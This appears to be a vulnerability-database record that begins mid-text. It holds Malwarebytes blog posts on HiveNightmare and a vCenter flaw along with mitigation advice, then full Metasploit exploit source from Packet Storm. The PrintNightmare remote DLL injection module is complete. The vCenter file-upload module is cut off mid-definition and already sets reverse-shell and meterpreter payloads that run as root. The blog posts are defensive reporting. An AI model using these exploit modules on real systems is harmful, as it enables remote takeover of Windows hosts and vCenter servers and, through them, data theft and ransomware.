sensitive Registry database files on Windows 10 and Windows 11, leaving them vulnerable to a local elevation of privilege vulnerability known as SeriousSAM or HiveNightmare.\n\nDoesn't sound serious? Reassured that users must already have access to the system and be able to execute code on said system to use this vulnerability? Don't be.\n\nUsing SeriousSAM, a user can access multiple system files, including the Security Accounts Manager (SAM) database. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. The attacker would then have full control, which means they can install programs, view, change, or delete data, and create new accounts with full user rights. Which is exactly what an attacker wants.\n\n### My mama said\n\nSAM stands for Security Accounts Manager and it is supposed to be a protected database that can only be accessed by users with Adminstrator privileges. This was designed as such because the database contains the hashed passwords for all users on a system.\n\nNow, I\u2019ve always been taught that anyone with physical access to your system, and enough knowledge, can take it over. One of the reasons why this is true is that the \u201cholder\u201d of the system can dump those sensitive Registry database files _when Windows is not running_. \n\nWhen Windows is not running the registry is not \u201cmounted\u201d and the "access violation" protection is inactive, since to another operating system (OS) they are just files like any other. You can see the caveat there. You need to look at the files from an external OS to pull this off. (I will leave the \u201chow to\u201d do that to your imagination.)\n\nWhile dumping a registry hive from an inactive Windows machine like that may sound daunting to some, and difficult for malware to pull off, SeriousSAM makes it much easier. SeriousSAM removes the need for that external OS, and for Windows to be off, making it a much more achievable trick. It allows users (or malicious programs inadvertently run by those users) to bypass the "access violation" protection on the computer they're using, while it's running.\n\n### Pass the hash\n\n"But the passwords are hashed!", I heard you thinking. In that case, meet pass-the-hash attacks. Windows NT LAN Manager (NTLM) is a challenge-response authentication protocol used to authenticate a client to a resource on an Active Directory domain. When the client requests access to a service associated with the domain, the service sends a challenge to the client, requiring the client to perform a mathematical operation using its authentication token, and then return the result of this operation to the service. The service may validate the result or send it to the Domain Controller (DC) for validation. If the service or DC confirm that the client\u2019s response is correct, the service allows access to the client. Sounds secure, right? Well, the fun part is that with the hash you have enough information to perform that \u201cmathematical operation\u201d required to gain access. The authentication process does not require the plaintext password. The hash is enough. \n\nSo, _pass the hash_ is the name for a technique that allows an attacker to authenticate to a remote server or service by using the hash of a user's password, instead of requiring the associated plaintext password as is normally the case.\n\n### Made easy\n\nThe vulnerability we have been referring to as SeriousSAM is listed as [CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>) and while it is unclear exactly which versions of Windows are vulnerable, it looks as if some versions of Windows 10 and all versions of Windows 11 are affected, as long as System Protection, aka Shadow Volumes, is enabled. The Microsoft advisory says "\u2026we can confirm that this issue affects Windows 10 version 1809 and newer operating systems". The company is researching the issue and we will update this post once we know more.\n\nThe vulnerability got its other name, HiveNightmare, because it affects registry hives, and as a reference to the recently discovered [PrintNightmare](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/>) vulnerabilities in the Windows Print Spooler service. I think it's a better name for this vulnerability because SAM is not the only sensitive Registry database that's affected. Others are all stored in the `%windir%\\system32 \\config` folder, as is SAM. They are SYSTEM, SECURITY, DEFAULT, and SOFTWARE. Which means there might be more options for hackers with limited access to raise privileges or achieve remote code execution waiting to be found.\n\nThe underlying problem is, in Microsoft's own words "overly permissive Access Control Lists (ACLs) on multiple system files". Those lax permissions are carried over into the Shadow copies where the files are unmounted and as unprotected as the files on the dormant computer my mother warned me about. So, any user can dump the database from the Shadow copy and as such create a readable database.\n\nShadow Volumes are enabled by default so that doesn\u2019t bring the number of systems at risk down a lot. It is a useful option, but in this case it is also what enables this vulnerability. \n\n### Mitigation\n\nWhile Microsoft is expected to come up with an out-of-band patch for this vulnerability, there are some things you can do to defeat the vulnerability. Whatever you do to address problem, note that fixing the cause does not necessarily fix broken permissions in shadow copies you have already taken.\n\nYou can find some useful commands for discovering if your systems have Shadow copies enabled, and whether they are vulnerable in the [CERT advisory](<https://www.kb.cert.org/vuls/id/506989>). The advisory notes that "simply having a system drive that is larger that 128GB in size and then performing a Windows Update or installing an MSI will ensure that a VSS shadow copy will be automatically created."\n\nMicrosoft recommends restricting access to the problematic folder and deleting Volume Shadow Copy Service (VSS) shadow copies to mitigate this issue.\n\n**Restrict access to the contents of `%windir%\\system32\\config`**\n\n * Open Command Prompt or Windows PowerShell as an administrator.\n * Run this command: icacls %windir%\\system32\\config\\\\*.* /inheritance:e\n\n**Delete Volume Shadow Copy Service (VSS) shadow copies**\n\n * Delete any System Restore points and Shadow volumes that existed prior to restricting access to `%windir%\\system32\\config`.\n * Create a new System Restore point (if desired).\n\n**Note: Deleting shadow copies could impact restore operations, including the ability to restore data with third-party backup applications.**\n\nThe post [HiveNightmare zero-day lets anyone be SYSTEM on Windows 10 and 11](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/hivenightmare-zero-day-lets-anyone-be-system-on-windows-10-and-11/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-07-21T14:31:50", "type": "malwarebytes", "title": "HiveNightmare zero-day lets anyone be SYSTEM on Windows 10 and 11", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-21T14:31:50", "id": "MALWAREBYTES:17B7F98583E0297FC4ECAB159A115DB9", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/hivenightmare-zero-day-lets-anyone-be-system-on-windows-10-and-11/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-28T20:35:10", "description": "### Last week on Malwarebytes Labs\n\n * Freedom Hosting operator [gets 27 years](<https://blog.malwarebytes.com/cybercrime/2021/09/freedom-hosting-operator-gets-27-years-for-hosting-dark-web-child-abuse-sites/>) for hosting dark web abuse sites\n * Microsoft makes a [bold move](<https://blog.malwarebytes.com/opinion/2021/09/microsoft-makes-a-bold-move-towards-a-password-less-future/>) towards a password-less future\n * New Mac malware masquerades as [iTerm2, remote desktop and other apps](<https://blog.malwarebytes.com/malwarebytes-news/2021/09/new-mac-malware-masquerades-as-iterm2-remote-desktop-and-other-apps/>)\n * Internet safety tips for kids and teens: a [comprehensive guide](<https://blog.malwarebytes.com/how-tos-2/2021/09/internet-safety-tips-for-kids-and-teens-a-comprehensive-guide-for-the-modern-parent/>) for the modern parent\n * Google, geofence warrants, [and you](<https://blog.malwarebytes.com/privacy-2/2021/09/google-geofence-warrants-and-you/>)\n * No, Colonel Gaddafi\u2019s daughter isn\u2019t [emailing to give you untold riches](<https://blog.malwarebytes.com/social-engineering/2021/09/no-colonel-gaddafis-daughter-isnt-emailing-to-give-you-untold-riches/>)\n * Patch vCenter Server \u201c[right now](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure/>)\u201d, VMWare expects CVE-2021-22005 exploitation within minutes of disclosure\n * [Patch now](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-insecure-hikvision-security-cameras-can-be-taken-over-remotely/>)! Insecure Hikvision security cameras can be taken over remotely\n * MSHTML [attack targets Russian state rocket centre](<https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/>) and interior ministry\n * Italian mafia cybercrime sting leads to [100+ arrests](<https://blog.malwarebytes.com/scams/2021/09/italian-mafia-cybercrime-sting-leads-to-100-arrests/>)\n * How to [clear your cache](<https://blog.malwarebytes.com/101/how-tos/2021/09/how-to-clear-your-cache/>)\n * Microsoft exchange autodiscover flaw [reveals users\u2019 passwords](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/microsoft-exchange-autodiscover-flaw-reveals-users-passwords/>)\n * Parents and teachers believe digital surveillance of kids [outweighs risks](<https://blog.malwarebytes.com/privacy-2/2021/09/parents-and-teachers-believe-digital-surveillance-of-kids-outweighs-risks/>)\n * SonicWall warns users to [patch critical vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/sonicwall-warns-users-to-patch-critical-vulnerability-as-soon-as-possible/>) \u201cas soon as possible\u201d\n * Beware! Uber scam [lures victims](<https://blog.malwarebytes.com/malwarebytes-news/2021/09/beware-uber-scam-lures-victims-with-alert-from-a-real-uber-number/>) with alert from a real Uber number\n * Teaching [cybersecurity skills to special needs children](<https://blog.malwarebytes.com/malwarebytes-news/2021/09/teaching-cybersecurity-skills-to-special-needs-children-with-alana-robinson-lock-and-code-s02e18/>) with Alana Robinson: Lock and Code S02E18\n\n### Other cybersecurity news\n\n * UK ministry of defence [apologises](<https://www.theregister.com/2021/09/23/afghan_email_fail_ministry_defence/>) - again - after another major email blunder in Afghanistan (Source: The Register)\n * Database containing personal info of 106 million international visitors to Thailand [exposed](<https://www.comparitech.com/blog/information-security/thai-traveler-data-leak/>) online (Source: Comparitech)\n * Fake WhatsApp backup message [delivers malware](<https://portswigger.net/daily-swig/fake-whatsapp-backup-message-delivers-malware-to-spanish-speakers-devices>) to Spanish speakers\u2019 devices (Source: The Daily Swig) \nMobile phones of 5 French cabinet ministers [infected by Pegasus malware](<https://www.france24.com/en/europe/20210924-mobile-phones-of-five-french-cabinet-ministers-infected-by-pegasus-malware>) (Source: France 24)\n * Ransomware dropping malware swaps phishing for [sneaky new attack route](<https://www.zdnet.com/article/this-ransomware-dropping-malware-has-swapped-phishing-for-a-sneaky-new-attack-route/>) (Source: ZDNet)\n * Phishing attacks more sophisticated, malicious emails [time to coincide](<https://www.cpomagazine.com/cyber-security/phishing-attacks-more-sophisticated-malicious-emails-timed-to-coincide-with-periods-of-low-energy-and-inattentiveness/>) with periods of low energy and inattentiveness (Source: CPO magazine)\n * Keeping your data [secure at work](<https://minutehack.com/news/keeping-your-data-secure-at-work>) (Source: Minute Hack)\n\nStay safe, everyone!\n\nThe post [A week in security (Sept 20 \u2013 Sept 26)](<https://blog.malwarebytes.com/a-week-in-security/2021/09/a-week-in-security-sept-20-sept-26-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-27T11:01:42", "type": "malwarebytes", "title": "A week in security (Sept 20 \u2013 Sept 26)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-27T11:01:42", "id": "MALWAREBYTES:F776F8D86D7BD9350BDC23F1E51B31BF", "href": "https://blog.malwarebytes.com/a-week-in-security/2021/09/a-week-in-security-sept-20-sept-26-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-28T20:35:11", "description": "VMware is urging users of vCenter server to patch no fewer than [19 problems](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) affecting its products. \n\nThese updates fix a variety of security vulnerabilities, but and one of them is particularly nasty. That would be [CVE-2021-22005](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22005>), a critical file upload vulnerability with a CVSS score of 9.8 out of 10.\n\nIt's so bad the company is advising users to **sort it out "[right now](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>)"**:\n\n> These updates fix a critical security vulnerability, and your response needs to be considered at once. Organizations that practice change management using the ITIL definitions of change types would consider this an \u201cemergency change.\u201d\n\n### CVE-2021-22005\n\nvServer Center is a way to [manage large infrastructure](<https://geek-university.com/vmware-esxi/what-is-vcenter-server/>). If you have lots of hosts and virtual machines, this is a very good way to manage every aspect of your setup. With this in mind, if someone manages to compromise your vCenter, it probably won't end well.\n\nAnd that's exactly what CVE-2021-22005 does. It's a file upload vulnerability and anyone with access to vServer Center over a network can exploit it. The configuration settings of vServer Center don't make any difference. If criminals get network access they can upload a specially made file and use it to execute code on the vServer Center.\n\nAs VMware points out, bad actors are often already in your network. They wait patiently to strike. It's likely they'll exfiltrate data slowly and nobody will ever know they're there. Being able to snag a win like this for themselves could increase the threat from ransomware and other malicious activity.\n\n### What should I do?\n\nWell, patch immediately is definitely the [go-to advice](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>). If an emergency patch falls outside how you usually do things, VMware mentions, but it really does impress upon readers that patching needs to be done as soon as possible. It is, perhaps, unusual (and refreshing) to see an organisation stress this fact so plainly, so kudos for being so forthright.\n\n### Is my vServer setup affected by this?\n\nIt depends. Some versions, such as vCenter Server 6.5, are not affected. Others are. You should refer to the [dedicated rundown on](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>) this issue and take appropriate action as soon as you possibly can. We'll leave the last word to VMware with regard to when you should be patching:\n\n> Immediately, the ramifications of this vulnerability are serious and it is a matter of time \u2013 likely minutes after the disclosure \u2013 before working exploits are publicly available.\n> \n> With the threat of ransomware looming nowadays the safest stance is to assume that an attacker may already have control of a desktop and a user account through the use of techniques like phishing or spearphishing, and act accordingly. This means the attacker may already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence.\n\nThis seems like very good advice.\n\nThe post [Patch vCenter Server "right now", VMWare expects CVE-2021-22005 exploitation within minutes of disclosure](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-22T11:27:11", "type": "malwarebytes", "title": "Patch vCenter Server \u201cright now\u201d, VMWare expects CVE-2021-22005 exploitation within minutes of disclosure", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-22T11:27:11", "id": "MALWAREBYTES:8791EE404FCD2E2A063F220E6486B422", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-05-25T15:25:18", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-25T00:00:00", "type": "packetstorm", "title": "Print Spooler Remote DLL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-05-25T00:00:00", "id": "PACKETSTORM:167261", "href": "https://packetstormsecurity.com/files/167261/Print-Spooler-Remote-DLL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'windows_error' \nrequire 'ruby_smb' \nrequire 'ruby_smb/error' \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::DCERPC \ninclude Msf::Exploit::Remote::SMB::Client::Authenticated \ninclude Msf::Exploit::Remote::SMB::Server::Share \ninclude Msf::Exploit::Retry \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::Deprecated \n \nmoved_from 'auxiliary/admin/dcerpc/cve_2021_1675_printnightmare' \n \nPrintSystem = RubySMB::Dcerpc::PrintSystem \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Print Spooler Remote DLL Injection', \n'Description' => %q{ \nThe print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted \nDCERPC request, resulting in remote code execution as NT AUTHORITY\\SYSTEM. This module uses the MS-RPRN \nvector which requires the Print Spooler service to be running. \n}, \n'Author' => [ \n'Zhiniang Peng', # vulnerability discovery / research \n'Xuefeng Li', # vulnerability discovery / research \n'Zhipeng Huo', # vulnerability discovery \n'Piotr Madej', # vulnerability discovery \n'Zhang Yunhai', # vulnerability discovery \n'cube0x0', # PoC \n'Spencer McIntyre', # metasploit module \n'Christophe De La Fuente', # metasploit module co-author \n], \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'SRVHOST' => Rex::Socket.source_address \n}, \n'Stance' => Msf::Exploit::Stance::Aggressive, \n'Targets' => [ \n[ \n'Windows', { \n'Platform' => 'win', \n'Arch' => [ ARCH_X64, ARCH_X86 ] \n}, \n], \n], \n'DisclosureDate' => '2021-06-08', \n'References' => [ \n['CVE', '2021-1675'], \n['CVE', '2021-34527'], \n['URL', 'https://github.com/cube0x0/CVE-2021-1675'], \n['URL', 'https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare'], \n['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1'], \n['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream'] \n], \n'Notes' => { \n'AKA' => [ 'PrintNightmare' ], \n'Stability' => [CRASH_SERVICE_DOWN], \n'Reliability' => [UNRELIABLE_SESSION], \n'SideEffects' => [ \nARTIFACTS_ON_DISK # the dll will be copied to the remote server \n] \n} \n) \n) \n \nregister_advanced_options( \n[ \nOptInt.new('ReconnectTimeout', [ true, 'The timeout in seconds for reconnecting to the named pipe', 10 ]) \n] \n) \nderegister_options('AutoCheck') \nend \n \ndef check \nbegin \nconnect(backend: :ruby_smb) \nrescue Rex::ConnectionError \nreturn Exploit::CheckCode::Unknown('Failed to connect to the remote service.') \nend \n \nbegin \nsmb_login \nrescue Rex::Proto::SMB::Exceptions::LoginError \nreturn Exploit::CheckCode::Unknown('Failed to authenticate to the remote service.') \nend \n \nbegin \ndcerpc_bind_spoolss \nrescue RubySMB::Error::UnexpectedStatusCode => e \nnt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first \nif nt_status == ::WindowsError::NTStatus::STATUS_OBJECT_NAME_NOT_FOUND \nprint_error(\"The 'Print Spooler' service is disabled.\") \nend \nreturn Exploit::CheckCode::Safe(\"The DCERPC bind failed with error #{nt_status.name} (#{nt_status.description}).\") \nend \n \n@target_arch = dcerpc_getarch \n# see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/e81cbc09-ab05-4a32-ae4a-8ec57b436c43 \nif @target_arch == ARCH_X64 \n@environment = 'Windows x64' \nelsif @target_arch == ARCH_X86 \n@environment = 'Windows NT x86' \nelse \nreturn Exploit::CheckCode::Detected('Successfully bound to the remote service.') \nend \n \nprint_status(\"Target environment: Windows v#{simple.client.os_version} (#{@target_arch})\") \n \nprint_status('Enumerating the installed printer drivers...') \ndrivers = enum_printer_drivers(@environment) \n@driver_path = \"#{drivers.driver_path.rpartition('\\\\').first}\\\\UNIDRV.DLL\" \nvprint_status(\"Using driver path: #{@driver_path}\") \n \nprint_status('Retrieving the path of the printer driver directory...') \n@config_directory = get_printer_driver_directory(@environment) \nvprint_status(\"Using driver directory: #{@config_directory}\") unless @config_directory.nil? \n \ncontainer = driver_container( \np_config_file: 'C:\\\\Windows\\\\System32\\\\kernel32.dll', \np_data_file: \"\\\\??\\\\UNC\\\\127.0.0.1\\\\#{Rex::Text.rand_text_alphanumeric(4..8)}\\\\#{Rex::Text.rand_text_alphanumeric(4..8)}.dll\" \n) \n \ncase add_printer_driver_ex(container) \nwhen nil # prevent the module from erroring out in case the response can't be mapped to a Win32 error code \nreturn Exploit::CheckCode::Unknown('Received unknown status code, implying the target is not vulnerable.') \nwhen ::WindowsError::Win32::ERROR_PATH_NOT_FOUND \nreturn Exploit::CheckCode::Vulnerable('Received ERROR_PATH_NOT_FOUND, implying the target is vulnerable.') \nwhen ::WindowsError::Win32::ERROR_BAD_NET_NAME \nreturn Exploit::CheckCode::Vulnerable('Received ERROR_BAD_NET_NAME, implying the target is vulnerable.') \nwhen ::WindowsError::Win32::ERROR_ACCESS_DENIED \nreturn Exploit::CheckCode::Safe('Received ERROR_ACCESS_DENIED implying the target is patched.') \nend \n \nExploit::CheckCode::Detected('Successfully bound to the remote service.') \nend \n \ndef run \nfail_with(Failure::BadConfig, 'Can not use an x64 payload on an x86 target.') if @target_arch == ARCH_X86 && payload.arch.first == ARCH_X64 \nfail_with(Failure::NoTarget, 'Only x86 and x64 targets are supported.') if @environment.nil? \nfail_with(Failure::Unknown, 'Failed to enumerate the driver directory.') if @config_directory.nil? \n \nsuper \nend \n \ndef setup \nif Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0 \nfail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.') \nend \n \nsuper \nend \n \ndef start_service \nfile_name << '.dll' \nself.file_contents = generate_payload_dll \n \nsuper \nend \n \ndef primer \ndll_path = unc \nif dll_path =~ /^\\\\\\\\([\\w:.\\[\\]]+)\\\\(.*)$/ \n# targets patched for CVE-2021-34527 (but with Point and Print enabled) need to use this path style as a bypass \n# otherwise the operation will fail with ERROR_INVALID_PARAMETER \ndll_path = \"\\\\??\\\\UNC\\\\#{Regexp.last_match(1)}\\\\#{Regexp.last_match(2)}\" \nend \nvprint_status(\"Using DLL path: #{dll_path}\") \n \nfilename = dll_path.rpartition('\\\\').last \ncontainer = driver_container(p_config_file: 'C:\\\\Windows\\\\System32\\\\kernel32.dll', p_data_file: dll_path) \n \n3.times do \nadd_printer_driver_ex(container) \nend \n \n1.upto(3) do |directory| \ncontainer.driver_info.p_config_file.assign(\"#{@config_directory}\\\\3\\\\old\\\\#{directory}\\\\#{filename}\") \nbreak if add_printer_driver_ex(container).nil? \nend \n \ncleanup_service \nend \n \ndef driver_container(**kwargs) \nPrintSystem::DriverContainer.new( \nlevel: 2, \ntag: 2, \ndriver_info: PrintSystem::DriverInfo2.new( \nc_version: 3, \np_name_ref_id: 0x00020000, \np_environment_ref_id: 0x00020004, \np_driver_path_ref_id: 0x00020008, \np_data_file_ref_id: 0x0002000c, \np_config_file_ref_id: 0x00020010, \n# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913 \np_name: \"#{Rex::Text.rand_text_alpha_upper(2..4)} #{Rex::Text.rand_text_numeric(2..3)}\", \np_environment: @environment, \np_driver_path: @driver_path, \n**kwargs \n) \n) \nend \n \ndef dcerpc_bind_spoolss \nhandle = dcerpc_handle(PrintSystem::UUID, '1.0', 'ncacn_np', ['\\\\spoolss']) \nvprint_status(\"Binding to #{handle} ...\") \ndcerpc_bind(handle) \nvprint_status(\"Bound to #{handle} ...\") \nend \n \ndef enum_printer_drivers(environment) \nresponse = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2) \nresponse = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2, p_drivers: [0] * response.pcb_needed, cb_buf: response.pcb_needed) \nfail_with(Failure::UnexpectedReply, 'Failed to enumerate printer drivers.') unless response.p_drivers&.length \nDriverInfo2.read(response.p_drivers.map(&:chr).join) \nend \n \ndef get_printer_driver_directory(environment) \nresponse = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2) \nresponse = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2, p_driver_directory: [0] * response.pcb_needed, cb_buf: response.pcb_needed) \nfail_with(Failure::UnexpectedReply, 'Failed to obtain the printer driver directory.') unless response.p_driver_directory&.length \nRubySMB::Field::Stringz16.read(response.p_driver_directory.map(&:chr).join).encode('ASCII-8BIT') \nend \n \ndef add_printer_driver_ex(container) \nflags = PrintSystem::APD_INSTALL_WARNED_DRIVER | PrintSystem::APD_COPY_FROM_DIRECTORY | PrintSystem::APD_COPY_ALL_FILES \n \nbegin \nresponse = rprn_call('RpcAddPrinterDriverEx', p_name: \"\\\\\\\\#{datastore['RHOST']}\", p_driver_container: container, dw_file_copy_flags: flags) \nrescue RubySMB::Error::UnexpectedStatusCode => e \nnt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first \nmessage = \"Error #{nt_status.name} (#{nt_status.description})\" \nif nt_status == ::WindowsError::NTStatus::STATUS_PIPE_BROKEN \n# STATUS_PIPE_BROKEN is the return value when the payload is executed, so this is somewhat expected \nprint_status('The named pipe connection was broken, reconnecting...') \nreconnected = retry_until_truthy(timeout: datastore['ReconnectTimeout'].to_i) do \ndcerpc_bind_spoolss \nrescue RubySMB::Error::CommunicationError, RubySMB::Error::UnexpectedStatusCode => e \nfalse \nelse \ntrue \nend \n \nunless reconnected \nvprint_status('Failed to reconnect to the named pipe.') \nreturn nil \nend \n \nprint_status('Successfully reconnected to the named pipe.') \nretry \nelse \nprint_error(message) \nend \n \nreturn nt_status \nend \n \nerror = ::WindowsError::Win32.find_by_retval(response.error_status.value).first \nmessage = \"RpcAddPrinterDriverEx response #{response.error_status}\" \nmessage << \" #{error.name} (#{error.description})\" unless error.nil? \nvprint_status(message) \nerror \nend \n \ndef rprn_call(name, **kwargs) \nrequest = PrintSystem.const_get(\"#{name}Request\").new(**kwargs) \n \nbegin \nraw_response = dcerpc.call(request.opnum, request.to_binary_s) \nrescue Rex::Proto::DCERPC::Exceptions::Fault => e \nfail_with(Failure::UnexpectedReply, \"The #{name} Print System RPC request failed (#{e.message}).\") \nend \n \nPrintSystem.const_get(\"#{name}Response\").read(raw_response) \nend \n \nclass DriverInfo2Header < BinData::Record \nendian :little \n \nuint32 :c_version \nuint32 :name_offset \nuint32 :environment_offset \nuint32 :driver_path_offset \nuint32 :data_file_offset \nuint32 :config_file_offset \nend \n \n# this is a partial implementation that just parses the data, this is *not* the same struct as PrintSystem::DriverInfo2 \n# see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030 \nDriverInfo2 = Struct.new(:header, :name, :environment, :driver_path, :data_file, :config_file) do \ndef self.read(data) \nheader = DriverInfo2Header.read(data) \nnew( \nheader, \nRubySMB::Field::Stringz16.read(data[header.name_offset..]).encode('ASCII-8BIT'), \nRubySMB::Field::Stringz16.read(data[header.environment_offset..]).encode('ASCII-8BIT'), \nRubySMB::Field::Stringz16.read(data[header.driver_path_offset..]).encode('ASCII-8BIT'), \nRubySMB::Field::Stringz16.read(data[header.data_file_offset..]).encode('ASCII-8BIT'), \nRubySMB::Field::Stringz16.read(data[header.config_file_offset..]).encode('ASCII-8BIT') \n) \nend \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/167261/cve_2021_1675_printnightmare.rb.txt"}, {"lastseen": "2021-10-07T14:18:18", "description": "", "cvss3": {}, "published": "2021-10-07T00:00:00", "type": "packetstorm", "title": "VMware vCenter Server Analytics (CEIP) Service File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-10-07T00:00:00", "id": "PACKETSTORM:164439", "href": "https://packetstormsecurity.com/files/164439/VMware-vCenter-Server-Analytics-CEIP-Service-File-Upload.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware vCenter Server Analytics (CEIP) Service File Upload', \n'Description' => %q{ \nThis module exploits a file upload in VMware vCenter Server's \nanalytics/telemetry (CEIP) service to write a system crontab and \nexecute shell commands as the root user. \n \nNote that CEIP must be enabled for the target to be exploitable by \nthis module. CEIP is enabled by default. \n}, \n'Author' => [ \n'George Noseevich', # Discovery \n'Sergey Gerasimov', # Discovery \n'VMware', # Initial PoC \n'Derek Abdine', # Analysis \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2021-22005'], \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html'], \n['URL', 'https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis'], \n['URL', 'https://censys.io/blog/vmware-cve-2021-22005-technical-impact-analysis/'], \n['URL', 'https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee'] \n], \n'DisclosureDate' => '2021-09-21', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true, \n'WfsDelay' => 60 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => 